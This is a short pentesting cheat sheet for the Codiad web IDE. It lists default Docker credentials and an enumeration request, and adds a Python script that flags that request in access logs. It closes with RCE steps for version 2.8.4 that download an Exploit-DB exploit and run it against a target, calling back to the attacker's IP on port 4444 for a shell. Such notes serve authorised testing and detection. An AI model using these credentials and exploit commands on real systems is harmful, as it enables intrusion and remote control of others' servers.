# Codiad Pentesting

Last modified: 2023-02-26

Codiad is a web-based IDE framework.
## Default Credentials

```sh
# Docker image - https://hub.docker.com/r/bitnami/codiad
# username:password
user:bitnami
```
## Enumeration

```sh
# Get the current directory on the system
/components/project/controller.php?action=get_current
```
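From the defender's side, the enumeration request above is a cheap thing to key on: the project controller is not something a browser session hits with `action=get_current` in bulk, so a scanner or script calling it tends to stand out in the web-server access log. The script below is an added example, not part of these notes or of the Codiad project: it parses combined-format access log lines, picks out requests to `/components/project/controller.php`, and reports which client addresses used the `get_current` action. The log lines, client addresses and timestamps are constructed sample data.

```python
"""Flag requests to Codiad's project controller in web-server access logs.

Added example, not part of the original notes. The only Codiad-specific
request shape used here is taken from the notes:
  /components/project/controller.php?action=get_current
All log lines below are constructed sample data.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format:
#   ip - user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request shape from the notes that a defender can key on.
CODIAD_CONTROLLER = "/components/project/controller.php"
ENUM_ACTION = "get_current"

# Constructed sample log: one scripted client probing the controller,
# one ordinary browser visit, and one unparseable line.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Feb/2023:10:01:02 +0000] "GET /components/project/controller.php?action=get_current HTTP/1.1" 200 87 "-" "python-requests/2.28"
198.51.100.4 - - [26/Feb/2023:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
this line is not an access log record
203.0.113.7 - - [26/Feb/2023:10:03:10 +0000] "GET /components/project/controller.php HTTP/1.1" 200 87 "-" "python-requests/2.28"
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["endpoint"] = parts.path
    # parse_qs returns lists; take the first 'action' value if present.
    rec["action"] = parse_qs(parts.query).get("action", [None])[0]
    return rec


def find_codiad_probes(log_text):
    """Return {client_ip: [(time, method, action), ...]} for hits on the project controller."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["endpoint"] != CODIAD_CONTROLLER:
            continue
        hits[rec["ip"]].append((rec["time"], rec["method"], rec["action"]))
    return dict(hits)


def enumeration_sources(log_text):
    """Client IPs that used action=get_current, i.e. the enumeration step in the notes."""
    return sorted(
        ip
        for ip, reqs in find_codiad_probes(log_text).items()
        if any(action == ENUM_ACTION for _, _, action in reqs)
    )


if __name__ == "__main__":
    for ip, reqs in find_codiad_probes(SAMPLE_LOG).items():
        print(ip, len(reqs), "controller request(s)")
    print("enumeration sources:", enumeration_sources(SAMPLE_LOG))
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents; the `find_codiad_probes` result is grouped by client address so that a single address issuing many controller requests (the pattern of a scripted scan) is easy to pick out, while a genuine IDE user normally shows up with their own session and browser user-agent.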
## Remote Code Execution (RCE) - v2.8.4

```sh
wget https://www.exploit-db.com/exploits/49705 -O exploit.py

# Arguments: <target-url> <username> <password> <local-ip> <local-port> <target-os>
# Linux
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 linux
# Windows
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 windows
```